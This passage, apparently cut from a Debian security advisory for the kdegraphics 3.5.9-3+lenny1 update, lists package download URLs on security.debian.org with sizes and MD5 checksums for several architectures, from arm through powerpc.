5725e00ed074682989c117fa8bd92bc5 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 391402 4464da8ddcf38d9c8196281dba608817 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 93836 964e161125a57b810f86114bca5e0555 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 746896 1d8ec12876b8b0ff8042848ff9189768 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 251798 300c55676681bb2fe11ce4e8a0e9a5d5 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 771096 8fd79382983a8b0a54ae4a5c608f7798 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 217932 e723ae36a2166880c5bd78ef192376a4 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 227632 252d9b6fcfc5154873aaea6b98a95087 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 526474 b91266ae395b249999a0d9c1dda08477 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 95612 402304685fac9beb7caa8acb89cbf4b0 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 123774 e1682b257a10e6115ab6d0302c9fd89d http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 163216 657917d64364cc2d87e3c82ff76918e8 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 754250 b8a6d2dc5b5c3ba601ba2b57f99def39 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 13512 038d2a27526f2620eecfdb2bdf507bce http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 83670 1e67c97765872cb33bf5fd8e6eb90994 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 2149602 e2dc467200af7059898eb9bb6c02c731 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 59756 3a74eb67515deb50cf2bcbcc0c91ef51 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 33565006 5d18ca0a4ae08914d58072a2349c649b http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 1223718 0d89da9c8976bf02aefe770e9a4d44d6 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 163926 51e346e2965d3f8777d69c38f528361b http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 1043130 16786b91a1edaadf7e3b2d036bb46f08 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 71382 95376cb88e8eb5d74e8d13a75171576b http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 482022 5c4e4e73dcf11e64865b9e2ceae9d7da armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 1050934 6d71fcb10454858355d28dbd90bf673b http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 136534 2943609b5a2f0dca57af7da9715cedff http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 13498 4b2ef9fa59e854c13264c415063c7858 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 482670 1b8abfb4d374527d2b02d5897e573520 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 83180 d5f62ad7602d4107bde68bb47381ca35 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 239546 097d24409aa70e1d4c86f56cf212347c http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 94288 6376a998f0a8352f7b906b74d968ee9f http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 386010 cdf39f24dbb3a34d58f87f959a20ba11 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 101458 58b67ac4f21014f2a89ecbf5fb21219b http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 227752 616e16119964046edd39ab94f4ba5295 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 527498 4b21ce4f9a57c56f22bedebc7f3764e0 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 71116 758667c7255452fc232577d14a834047 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 755684 a81fd2f6420afd7d1f07f0aadbb551e0 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 166162 351295a1937a81b7fb106ed888f6188a http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 124784 d0582fd6e9bb93273cbf9eaeab5b45ca http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 33006582 e352bebb68dff27df5a682cc80fda55d http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 59148 3980a9d0e717e584b0aab1be5087a134 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 747902 01ebc2692aa241aba7928cfbb2e9b03e http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 163658 b6a957488fdd938a2fb7f4f87c7a9ed0 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 803006 43cd282daefb7fea09f525023d0b4517 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 2170166 d25f3885f0721742e8ae066b62dfbe08 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 217648 5f76ce6485c81b9ee391270be92a2ae7 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 97638 67317ea8846a1f9675a10decc4a6bc15 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_armel.deb Size/MD5 checksum: 1047420 9d6bdc51966950176f7d811ec1eb7fcd hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 60154 33092de39ee55c6189ca80c35da24405 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 300822 8b613712f554898562536e1e42f0a63a http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 101628 5b79a214b553d0c73c38edf68b58517e http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 760688 3b6fe31dcaf90d5441835bf3caf2b079 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 252780 41804512331d4903ccfdd22f5bea840f http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 79794 407be7817d2fbeadc9a2f1fca29e47d3 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 508388 6fb14c245fddf2ce919e7ca9ac51f792 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 95362 3b3991aed4739cd4b849112aea36ee09 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 449548 84ea2bacf837ce9ac7f808bc81a9b363 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 95770 ed1884db40b3971a0440c89c99184374 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 946800 cf4eeb0fe421ebc3e12a87873504595a http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 26286170 63ef41719ab12d66209beac43fb6cdb7 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 558726 0133793613690399845d568b647cbd95 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 110650 4d3c5c34ce026d1f0a88392ea9aec2cf http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 257908 73b2d5ccdc123436a21c40621115bffb http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 1382332 279a6810a9ffa21617a56577e5c155aa http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 176908 b12e01dac140811818480429a93eb2e3 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 169704 cbebb7d5083f6150203de697af3bf097 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 140626 f9cdc207f477b2a37c167f4eb2024f36 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 151306 29d5bcccbeffdbfc35a47e0b33183844 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 13504 59f49cb9881f15e337403ebd2e876bd2 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 888706 70be229ede5060052c7d5ab61b16cab6 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 1131082 84c09613d81e0e5d40b5a0599f57cc02 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_hppa.deb Size/MD5 checksum: 2469602 6839152140bb071d7a7bbb84bac03e97 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 97078 9d3c94eb6cabf6a7f998fa9ffe954bfd http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 222912 b0854f86ada31ae3f908d9c077fda44e http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 88412 d177bdb59f8b4cd4286d6c6a7b9bb189 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 75186 a85996e931e769833905e4af3b29ce55 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 13496 47f3b944d8aa7cd0873e1702c48c92ba http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 405590 f3f7d8da99f00fb2906497e4f1a8b1f9 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 539406 ebe1c7685acd074513dcb1e7aaa27ca0 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 489702 ce7020623d559eea8668f9e1b884c54a http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 63090 861612b37ee2c706066a36f05693012d http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 141308 41a4f7ef14dc3c662b4a3f65920b731a http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 236202 2039aac262f83e800f51ed0a485eb139 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 107838 257d1703fe08a582ea097704882faa3e http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 172890 bdf4976a68ea1cf5c44fc1f589d0a5ef http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 808976 bd754e226c29c6d1fb977c4ea3f15d5c http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 167820 9f01143cda19e189de887a3b490cd49d http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 2256720 ac367b07e89f8e099b1d395f70d28c01 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 843108 50525329754e920e30f8bbbab4ee75b7 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 132234 ab1506f7ec28abd98e1498a9d907331d http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 1071012 98f28dc0ddaa53209108f0030dd7fb8e http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 25293598 1b962c64c9ccfe0850cdee4bee7b5c8e http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 99602 81c1fa875a2f5ba6a7d2e0c1bb57d340 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 1232936 11f8797743bbc344204f666ffe3647a6 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 760512 2be01413a549a4fd0ef635ed292a3a02 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_i386.deb Size/MD5 checksum: 257816 55a8b05afdf2a5473040ca825ee1c777 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 818366 d4798a87cecfd7d9b927b41d772764c0 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 488828 328e215091b06ce8fde8cd1605609d43 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 25364564 7270883396b5744cba3add99df542ed6 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 89560 e656b7b87d96cc0e92694cd668f64859 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 531926 fcc8042638d887b979d8c83570e56320 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 2750750 0f6d8bb0ae98135a8f3b8a14fde8ef6d http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 182090 bfb4546bdd8f439d6fdb90f78c39b3e0 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 300348 424b48c496d4cbe8d0e0c24e6914fea8 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 215548 09024b64587df6ead69c5204e6255bea http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 111806 43f7401cc5dc7964205a3b5788529f5c http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 1171068 de964dfda59dba1844443e475356520d http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 616282 aa2e8fd43795d6807615aa44af520fc2 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 1256546 49be44462041195e17b979e1f172adf7 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 1492244 88db5646f1dbdfe2351f78140a91fa45 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 124244 d06bd039b56fbd39c389c7230645f6eb http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 294308 eda4f9d4887d37efea0c0606bd5e2630 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 178556 e1f5810ec224e47acfbbba53d6992b36 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 66722 1a8b5d1357c5bbb89e1b9a2616eca0b1 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 124302 79df484c9931c2183ebc7d5b501d8d58 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 94362 26fcdc67c6905f2490f5580a139556bd http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 13496 dbd590c1646ced4ce34062ef7f4bf0d4 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 1210464 f6a178b7a71c3696798b8815b8903b75 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 159082 e8507c229564e74fe446b51c10ab1c09 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_ia64.deb Size/MD5 checksum: 383092 0f45cebe1880296fa1758cf4ddd6304b mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 102730 c09693e44150f94ba81d3210a9785b92 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 221564 8bf49438dc5b071f3b22a4e16fe145a1 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 1109202 7ea76e3bd1760775f57cc305286d3f9d http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 1089090 bef1dc08c615a5253f20772d4c150b2a http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 69894 28f5898a643a5da9ffe7f299d1f129b5 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 828526 d7c0696846f61ef882456cb442baafae http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 480092 9f8149b8c84fa4e95ec3ca5ea2429da5 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 757340 0594ca7f417410b4f99bfd32e8910fdb http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 99964 2f14d8446f2593375e7e73e8c7830555 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 517638 8b7e724ab60ab74a301e3a8573c2dde4 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 244618 d065664867e7fbaa1e79c140dca57a23 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 26705680 dc864930cacd486a2b90026cdce7bf63 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 13496 626c6009eb8ce9dd5025fa69c007ea36 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 94366 e573484ce71e9340767aa5130824df50 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 168490 b31fad69d903af2d994d3f39a02c4fb5 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 748942 8f97407542d66a31c66b5ac6d7a88039 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 82976 7c51b8a5c15110178e97955f62ec4b34 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 123894 8f637d55657e633ba57302191ef6abd1 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 2114234 dff1727a5c8ea95cf2657de32642c49d http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 177190 a99bd78ff7ffec4aeeedcdedb87e9e9f http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 138954 ab684399bfe4d3d0dda461978fd42f48 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 57942 d75a095256d0c00cea5452d794fcbcd1 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 390348 4b9456cffd018514a937ed5cb4124f13 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_mips.deb Size/MD5 checksum: 206684 7132c18d8b6fa9535e0db252e91ad69b mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 138708 537c781567de6c7fb455f8c82883d95a http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 745694 4bae4c1456f675dab10bbfbfe691ecfc http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 94376 32e82a5d66a85afba17f2a0eb9a6bb0d http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 242664 a3430b75167fc0ce419ba2891fac8e3b http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 99282 0ce02e74c990a7472e3ab77aa7cdbc65 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 122230 9b66a2f3aa0f7a67b490b8688f80561a http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 13500 716a62675374a3d52f41e32ad571c1a9 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 1061316 5c56f881eb6aa0af1752f6bfe7bfa9aa http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 2097486 0e0f300f5a1f4f2c84aab6b12672aa14 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 82654 320a0e06aba597cfc568981ddddc2f5c http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 25680530 9c4205f7927bb3116bb1e31ee15d168f http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 69852 21f1eafbff78f8d424acceb1463b90c6 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 517148 b159a3acf0e49f9514a5381b35659497 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 168106 20e31b3080ffcde4901f808a91cfc161 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 57864 10a5d266e861d9ec35b9c4dd78cb4913 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 478516 03f90ba32184e87c561ac355ccec49ae http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 388378 1efa9ce64cf60b0795901bf35dc4e53f http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 814058 10769b430175e802c632b03dd6277e73 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 755640 e3b75cf4f593ec7d307989d77a5ca1ca http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 176084 33dcb7ee545a8b9eaa99325b06c928e5 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 1105362 085d429a8938af2babc1650db41b11f7 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 102568 30223561a7999ac53260ec4b4d32af50 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 205558 221c78de0ad22c2847c58cb74285a376 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_mipsel.deb Size/MD5 checksum: 219406 2a3403fec05145529cda12b588a17a1a powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 320010 141601c2883cd7ad11185ca59557c171 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 138992 b8d9d86bde0921fa183afe0122812024 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 1331390 125ce1b459d937091bbf8df72cc5beda 